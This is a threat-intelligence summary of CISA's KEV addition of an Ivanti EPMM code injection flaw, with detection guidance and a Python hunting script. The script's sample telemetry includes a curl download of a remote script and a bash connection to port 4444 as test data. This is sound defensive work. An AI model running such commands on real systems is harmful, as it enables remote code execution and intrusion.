
CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added CVE-2026-1340, a code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM), to its Known Exploited Vulnerabilities (KEV) Catalog due to evidence of active exploitation. All organizations, especially federal agencies under BOD 22-01, are strongly urged to prioritize timely remediation to protect their networks against active threats.

Sens: Immediate | Conf: high | Analyzed: 2026-04-08

Authors: CISA

Source: CISA

Key Takeaways

  • CISA has added CVE-2026-1340 to the Known Exploited Vulnerabilities (KEV) Catalog.
  • CVE-2026-1340 is a Code Injection vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM).
  • There is confirmed evidence of active exploitation of this vulnerability in the wild.
  • Federal Civilian Executive Branch (FCEB) agencies are mandated to remediate this vulnerability per BOD 22-01.

Affected Systems

  • Ivanti Endpoint Manager Mobile (EPMM)

Vulnerabilities (CVEs)

  • CVE-2026-1340

Attack Chain

Threat actors are actively exploiting CVE-2026-1340, a code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM). The CISA alert does not detail the exploit chain. In general, code injection in a web-exposed management server gives the attacker command execution in the context of the EPMM service account, which can lead to full compromise of the appliance, persistence on it, and lateral movement into the networks and directory services the MDM server is trusted to reach.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

N/A

Detection Engineering Assessment

  • EDR Visibility: Medium — endpoint agents are unlikely to see the web-layer injection itself. Where host telemetry is available (EPMM is a Linux-based appliance, so this depends on what the appliance exposes), shells or interpreters spawned by the EPMM service process are the reliable signal.
  • Network Visibility: Medium — network sensors and WAFs can catch the exploit request only if signatures exist for it; subsequent outbound command-and-control traffic from the EPMM server is visible regardless.
  • Detection Difficulty: Moderate — catching the exploit itself requires application-layer visibility or WAF rules, but post-exploitation activity (child processes, new outbound connections) should be visible with standard behavioural monitoring.

Required Log Sources

  • Web Application Firewall (WAF) logs
  • Application logs (Ivanti EPMM)
  • Process execution logs from the EPMM host. EPMM is a Linux appliance, so Windows Event ID 4688 / Sysmon Event ID 1 do not apply; use auditd execve records or whatever process telemetry the appliance exposes.
  • Network connection logs (firewall, NetFlow or proxy) for outbound traffic from the EPMM server.

Hunting Hypotheses

  • Hypothesis: unexpected child processes (sh, bash, python, perl, curl, wget) spawned directly by the Ivanti EPMM web or application service, indicating successful code injection and execution. Restricting the parent to the EPMM service process keeps cron- and administrator-spawned shells out of the result set.
    Telemetry: process creation logs
    ATT&CK Stage: Execution
    FP Risk: Low

Control Gaps

  • Delayed patch management for public-facing infrastructure
  • Lack of application-layer monitoring and WAF enforcement

Key Behavioral Indicators

  • Anomalous child processes originating from Ivanti EPMM services
  • Unexpected outbound network connections originating from the EPMM server to unknown external IP addresses
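The hunting hypothesis and the two behavioural indicators above, run over a constructed sample of host telemetry. This is an added example, not code from CISA or Ivanti. It assumes a JSON-per-line feed of process-creation and outbound-connection events from the EPMM host; the field names, the process images under which the EPMM web/app tier runs, and the egress allowlist are all assumptions, and the IP addresses are documentation ranges rather than real infrastructure.

```python
"""Hunt for shell children of the EPMM service and unexpected egress.

Added example, not code from CISA or Ivanti. Assumes a JSON-per-line feed of
process-creation and outbound-connection events; field names and the EPMM
service image names are assumptions, not Ivanti-documented values.
"""
import ipaddress
import json
import re

# Assumption: images under which the EPMM web/app tier runs (hypothetical).
EPMM_SERVICE_IMAGES = {"java", "httpd", "nginx"}
# EPMM is a Linux appliance, so look for POSIX shells, interpreters and
# downloaders rather than cmd.exe / powershell.exe.
SUSPICIOUS_CHILD_IMAGES = {"sh", "bash", "dash", "python", "python3", "perl", "curl", "wget"}
# Assumption: networks the EPMM server legitimately talks to.
EGRESS_ALLOWLIST = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.0.2.0/24")]

# Constructed sample telemetry (documentation IPs, not real C2).
SAMPLE_EVENTS = """\
{"type":"process","host":"epmm01","parent_image":"java","parent_user":"tomcat","image":"bash","cmdline":"bash -c 'id;uname -a'"}
{"type":"process","host":"epmm01","parent_image":"java","parent_user":"tomcat","image":"java","cmdline":"java -jar worker.jar"}
{"type":"process","host":"epmm01","parent_image":"cron","parent_user":"root","image":"sh","cmdline":"sh /etc/cron.daily/logrotate"}
{"type":"process","host":"epmm01","parent_image":"java","parent_user":"tomcat","image":"curl","cmdline":"curl http://198.51.100.7/x.sh -o /tmp/x.sh"}
{"type":"network","host":"epmm01","image":"java","direction":"outbound","dst_ip":"10.20.0.5","dst_port":443}
{"type":"network","host":"epmm01","image":"bash","direction":"outbound","dst_ip":"198.51.100.7","dst_port":4444}
"""

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_events(text):
    """One JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def shell_children_of_epmm(events):
    """Hypothesis: interpreter or downloader spawned directly by the EPMM service.

    Keying on the parent image keeps cron- and admin-spawned shells (same child
    names, different parent) out of the result set, which is what keeps FP low.
    """
    return [
        e for e in events
        if e.get("type") == "process"
        and e.get("parent_image") in EPMM_SERVICE_IMAGES
        and e.get("image") in SUSPICIOUS_CHILD_IMAGES
    ]


def unexpected_egress(events):
    """Indicator: outbound connections from the EPMM host to non-allowlisted IPs."""
    hits = []
    for e in events:
        if e.get("type") != "network" or e.get("direction") != "outbound":
            continue
        dst = ipaddress.ip_address(e["dst_ip"])
        if not any(dst in net for net in EGRESS_ALLOWLIST):
            hits.append(e)
    return hits


def correlate(events):
    """Tie the two signals together: an IP on a flagged child's command line
    that the host later connects to. Returns (child image, destination IP)."""
    children = shell_children_of_epmm(events)
    egress_ips = {e["dst_ip"] for e in unexpected_egress(events)}
    pairs = []
    for c in children:
        for ip in IPV4_RE.findall(c.get("cmdline", "")):
            if ip in egress_ips:
                pairs.append((c["image"], ip))
    return pairs


def run_hunt(text=SAMPLE_EVENTS):
    """Return the three result sets as plain tuples for easy review or assertion."""
    events = parse_events(text)
    return {
        "shell_children": [(e["parent_image"], e["image"]) for e in shell_children_of_epmm(events)],
        "egress": [(e["image"], e["dst_ip"], e["dst_port"]) for e in unexpected_egress(events)],
        "correlated": correlate(events),
    }


if __name__ == "__main__":
    for name, rows in run_hunt().items():
        print(name)
        for row in rows:
            print("  ", row)
```

On the sample feed the java-to-bash and java-to-curl events are flagged, the cron-spawned sh is not, and the curl download host matches the later outbound connection on port 4444. Against real telemetry the allowlist should be built from the EPMM server's observed egress (push notification services, vendor update hosts, internal LDAP and SIEM), and the correlation window should be bounded in time.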

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Apply the vendor-supplied patch or mitigation for CVE-2026-1340 to all Ivanti EPMM instances immediately.

Infrastructure Hardening

  • Restrict access to the Ivanti EPMM management interfaces to trusted internal networks or specific IP addresses.
  • Deploy and configure Web Application Firewall (WAF) rules to monitor and block suspicious requests targeting the EPMM server.

User Protection

  • N/A

Security Awareness

  • Ensure vulnerability management teams prioritize and track alerts originating from the CISA KEV catalog for immediate action.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1059 - Command and Scripting Interpreter